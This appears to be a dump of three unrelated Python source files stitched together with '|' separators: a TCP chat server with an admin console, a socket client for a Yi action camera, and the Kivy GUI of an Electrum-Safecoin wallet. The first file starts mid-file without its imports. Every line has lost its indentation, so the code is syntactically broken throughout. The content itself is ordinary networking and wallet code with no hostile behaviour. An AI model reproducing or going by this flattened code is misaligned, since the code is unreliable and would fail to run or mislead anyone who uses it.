from time import gmtime, strftime, sleep
import os
connectionDictionary = {} # dicrionary where to put all connection threads in
currentTime = '' # variable for displaying the current time in logs
halt = False # indicator variable for program shutdown
# building socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(("0.0.0.0", 2018))
server_socket.listen(10)
class connectedHost(threading.Thread):
"""Class for the connection Treads"""
def __init__(self, connection, address, iD):
self.connection = connection
self.ip, self.port = address
self.id = iD
if self.ip in getConnectedIPs():
self.rejectConnection("You are already connected with this IP")
return
while not halt:
username = str(self.connection.recv(2048), "utf8")
username = cliInterpretor(username)
if username[0] == "%exit":
return
elif username[0] == "%setusername":
if len(username) < 2:
continue
self.username = username[1]
break
self.isonline = True
self.broadcast(self.username + " is online")
print(self.username + " is online on " + self.ip + ":" + str(self.port) + " with PID " + str(self.id))
threading.Thread.__init__(self)
self.daemon = True
def run(self):
while not halt:
try:
message = self.connection.recv(2048)
except OSError:
return
if (not message) or (message == bytes("%exit", "utf8")):
self.closeConnection()
return
message = str(message, "utf8")
self.broadcast(self.username + ": " + message)
return
def sendMessage(self, message):
self.connection.send(bytes(message, "utf8"))
def changeUsername(self, newUsername):
self.broadcast(self.username + " changed his name to " + newUsername)
self.username = newUsername
def broadcast(self, message):
for connection in connectionDictionary:
if connectionDictionary[connection].isonline is True:
if connectionDictionary[connection].id != self.id:
connectionDictionary[connection].sendMessage(message)
def rejectConnection(self, exitmessage):
try:
self.connection.send(bytes(exitmessage, "utf8"))
self.connection.send(bytes("%exit", "utf8"))
except:
return
self.connection.close()
self.isonline = False
print("Connection from " + self.ip + ":" + str(self.port) + "rejected")
return
def closeConnection(self, exitmessage=False):
if exitmessage:
try:
self.connection.send(bytes(exitmessage, "utf8"))
self.connection.send(bytes("%exit", "utf8"))
except OSError:
return
self.connection.close()
self.isonline = False
self.broadcast(self.username + " left")
print(self.username + " on " + self.ip + ":" + str(self.port) + " with PID " + str(self.id) + " disconnected")
return
def updateTime():
global currentTime
while not halt:
currentTime = "[" + strftime("%Y-%m-%d %H:%M:%S", gmtime()) + "] "
sleep(1)
return
def cliInterpretor(string):
keywords = []
currentWord = ''
isInWord = False
isInString = False
for char in string:
if isInString:
if char == "\"" or char == "\'":
keywords.append(currentWord)
currentWord = ''
isInString = False
else:
currentWord += char
elif isInWord:
if char == ' ':
keywords.append(currentWord)
currentWord = ''
isInWord = False
else:
currentWord += char
else:
if char == "\"" or char == "\'":
isInString = True
elif char != ' ':
isInWord = True
currentWord += char
if currentWord != '':
keywords.append(currentWord)
return keywords
def ls(args):
if len(args) == 0:
if len(connectionDictionary) == 0:
print("ls: There are no connections")
for key in connectionDictionary:
print(key + ": " + str(connectionDictionary[key]))
elif len(args) == 1:
if args[0] in connectionDictionary:
print("Properties of \'" + args[0] + "\':")
print("ID: " + str(connectionDictionary[args[0]].id))
print("IP: " + connectionDictionary[args[0]].ip)
print("Port: " + str(connectionDictionary[args[0]].port))
print("Username: " + connectionDictionary[args[0]].username)
print("isonline: " + str(connectionDictionary[args[0]].isonline))
else:
print("ls: Connection \'" + args[0] + "\' not found")
else:
print("ls: Expect max. 2 arguments")
def getConnectedIPs():
ipList = []
for connection in connectionDictionary:
if connectionDictionary[connection].isonline is True:
ipList.append(connectionDictionary[connection].ip)
print(ipList)
return ipList
def setusername(args):
if len(args) == 0:
print("setusername: Of which connection do you want to change the username")
elif len(args) == 1:
if args[0] in connectionDictionary:
if connectionDictionary[args[0]].isonline is True:
print("setusername: To which username do you want to change \'" + args[0] + "\'")
else:
print("setusername: \'" + args[0] + "\' isn't online anymore")
else:
print("setusername: Connection \'" + args[0] + "\' doesn't exist")
elif len(args) == 2:
if args[0] in connectionDictionary:
if connectionDictionary[args[0]].isonline is True:
connectionDictionary[args[0]].changeUsername(args[1])
else:
print("setusername: \'" + args[0] + "\' isn't online anymore")
else:
print("setusername: Connection \'" + args[0] + "\' doesn't exist")
def kick(args):
if len(args) == 0:
print("kick: Which connection do you want to kick?")
elif len(args) == 1:
try:
connectionDictionary[args[0]].closeConnection("You were kicked by the server")
except KeyError:
print("kick: the connection \'" + args[0] + "\' doesn't exist")
elif len(args) == 2:
try:
connectionDictionary[args[0]].closeConnection(args[1])
except KeyError:
print("kick: the connection \'" + args[0] + "\' doesn't exist")
else:
print("kick: Expect max. 2 arguments")
def time(args):
if len(args) == 0:
print(strftime("%Y-%m-%d %H:%M:%S", gmtime()))
else:
print("kick: Expect max. 0 arguments")
def shutdown():
global halt
print("Closing connection listener...")
halt = True # kill all threads
print("Closing all connection threads...")
for connection in connectionDictionary:
if connectionDictionary[connection].isonline is True:
connectionDictionary[connection].closeConnection("The server is shutting down you will be disconnected now")
print("Closing socket...")
server_socket.close()
print("Exiting")
exit(0)
def acceptConnections():
print("Started connection listener")
global connectionDictionary
connectionCounter = 0
while not halt:
try:
connection, address = server_socket.accept()
except ConnectionAbortedError:
return
connectionDictionary["conn" + str(connectionCounter)] = connectedHost(connection, address, connectionCounter)
try:
connectionDictionary["conn" + str(connectionCounter)].start()
except RuntimeError:
print("Connection don't created, because initialization process failed")
connectionCounter += 1
return
def console():
print("Welcome to the TCPChat2 server console")
print("I'm ready for your commands!")
while True:
command = str(input("$ "))
command = cliInterpretor(command)
if len(command) == 0:
continue
elif command[0] == "ls":
ls(command[1:])
elif command[0] == "exit":
shutdown()
elif command[0] == "kick":
kick(command[1:])
elif command[0] == "clear" or command[0] == "cls":
os.system("clear")
elif command[0] == "time":
time(command[1:])
elif command[0] == "setusername":
setusername(command[1:])
else:
print("Command \'" + command[0] + "\' not found")
print("")
# creating thread for accepting connections
acceptConnectionsThread = threading.Thread(target=acceptConnections)
acceptConnectionsThread.daemon = True
acceptConnectionsThread.start()
# creating thread for time logging
timeUpdater = threading.Thread(target=updateTime)
timeUpdater.daemon = True
timeUpdater.start()
def main():
console()
if __name__ == "__main__":
main()
|
api.py | import socket
import json
import time
import logging
import threading
def logger(name, loglevel="ERROR"):
log = logging.getLogger(name)
log.setLevel(loglevel)
if len(log.handlers) < 1:
ch = logging.StreamHandler()
ch.setLevel(loglevel)
formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s - %(message)s"
)
ch.setFormatter(formatter)
log.addHandler(ch)
return log
class yibase:
def __init__(self, connection_socket, loglevel="ERROR"):
self.socket = connection_socket
self.log = logger(type(self).__name__, loglevel)
class yisocket:
def __init__(self, ip="192.168.42.1", port=7878, loglevel="ERROR"):
self.ip = ip
self.port = port
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.token = None
self.enabled = False
self.log = logger("yisocket", loglevel)
def send(self, id, param=None, param_type=None):
data = {"msg_id": id}
if self.token:
data["token"] = self.token
else:
data["token"] = 0
if param:
data["param"] = param
if param_type:
data["type"] = param_type
self.socket.send(str.encode(json.dumps(data)))
time.sleep(1)
def __process_message(self, message):
try:
resp = json.loads(message)
if "rval" in resp:
if resp["rval"] == -3:
self.log.error("Different device connected.")
raise Exception
elif resp["rval"] == -4:
self.log.error("Unauthorized: %i" % resp["msg_id"])
raise Exception
elif resp["rval"] == -14:
self.log.error("Unable to set setting.")
raise Exception
elif resp["rval"] == -27:
self.log.error("An error has occured. Check SD.")
raise Exception
except json.decoder.JSONDecodeError:
self.log.error("JSON decode failed: %s" % message)
resp = {}
return resp
def get_messages(self, size=512):
raw = self.socket.recv(size).decode()
if not "}{" in raw:
return [self.__process_message(raw)]
else:
self.log.debug("Multiple messages found: %s" % raw)
a = raw.split("}{")
messages = []
for j in a:
if not j.startswith("{"):
j = "{" + j
if not j.endswith("}"):
j += "}"
msg = self.__process_message(j)
messages.append(msg)
return messages
# Connect to camera and get the token
def connect(self):
self.socket.connect((self.ip, self.port))
self.token = self.get_token()
def close(self):
self.socket.close()
def get_token(self):
self.log.debug("Get connection token")
self.send(257)
resp = self.get_messages()
if resp:
if isinstance(resp, list):
for i in resp:
if "rval" in i and "param" in i:
resp = i
if not "rval" in resp:
resp = self.get_messages()
if "param" in resp:
self.log.debug("Token found: %s" % resp["param"])
return resp["param"]
class yistream(yibase):
def __init__(self, connection_socket, loglevel="ERROR"):
super().__init__(connection_socket, loglevel)
self.enabled = False
def __start_thread(self):
self.socket.send(259, param="none_force")
self.log.debug("Stream enabled: rtsp://%s/live" % self.socket.ip)
while self.enabled:
time.sleep(1)
def start(self):
self.enabled = True
t = threading.Thread(target=self.__start_thread, args=[])
t.start()
def stop(self):
self.log.debug("Disabling stream")
self.enabled = False
class yivideo(yibase):
def start(self):
self.log.debug("start recording video to SD")
self.socket.send(513)
def stop(self):
self.log.debug("stop recording video")
self.socket.send(514)
path = None
messages = self.socket.get_messages()
for m in messages:
if "param" in m and "type" in m:
if m["type"] == "video_record_complete":
path = m["param"]
self.log.debug("recording saved: %s" % path)
return path
class yiphoto(yibase):
def capture(self):
self.log.debug("saving photo")
self.socket.send(769)
resp = self.socket.get_messages()
for m in resp:
if "type" in m and "param" in m:
if m["type"] == "photo_taken":
self.log.debug("Photo saved: %s" % m["param"])
return m["param"]
class yisettings(yibase):
def options(self, param):
self.socket.send(9, param)
resp = self.socket.get_messages()
options = None
for m in resp:
if "msg_id" in m and "options" in m:
if m["msg_id"] == 9:
options = dict()
options["options"] = m["options"]
if "permission" in m:
options["permission"] = m["permission"]
return options
def set(self, setting, option):
self.socket.send(2, option, setting)
self.socket.get_messages()
def get(self):
self.socket.send(3)
resp = self.socket.get_messages(4096)
settings = None
for m in resp:
if "msg_id" in m and "param" in m:
if m["msg_id"] == 3:
settings = m["param"]
if settings:
settings_joined = dict()
for s in settings:
settings_joined = {**settings_joined, **s}
settings = settings_joined
return settings
class yi:
def __init__(self, ip="192.168.42.1", port=7878, loglevel="DEBUG"):
self.ip = ip
self.port = port
self.log = logger("yi", loglevel)
self.socket = yisocket(ip, port, loglevel)
self.stream = yistream(self.socket, loglevel)
self.video = yivideo(self.socket, loglevel)
self.photo = yiphoto(self.socket, loglevel)
self.settings = yisettings(self.socket, loglevel)
def get_settings(self):
self.socket.send(3)
opts = self.socket.get_messages(4096)
return opts
def get_battery_level(self):
self.socket.send(13)
resp = self.socket.get_messages()
level = None
type = None
for m in resp:
if "type" in m and "param" in m:
level = m["param"]
type = m["type"]
return {"level": level, "type": type}
def connect(self):
self.socket.connect()
def close(self):
self.socket.close()
|
main_window.py | import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum_safecoin
from electrum_safecoin.bitcoin import TYPE_ADDRESS
from electrum_safecoin import WalletStorage, Wallet
from electrum_safecoin_gui.kivy.i18n import _
from electrum_safecoin.paymentrequest import InvoiceStore
from electrum_safecoin.util import profiler, InvalidPassword
from electrum_safecoin.plugins import run_hook
from electrum_safecoin.util import format_satoshis, format_satoshis_plain
from electrum_safecoin.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_safecoin_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_safecoin_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_safecoin_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_safecoin_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_safecoin_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_safecoin_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_safecoin.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_safecoin import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'safecoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'SAFE')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum-Safecoin App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_safecoin.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('safecoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_safecoin.transaction import Transaction
from electrum_safecoin.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_safecoin.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum_safecoin.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for safecoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
Logger.debug('Electrum-Safecoin: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_safecoin_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_safecoin_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_safecoin_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_safecoin_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum-safecoin.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum-Safecoin', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet.has_password and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
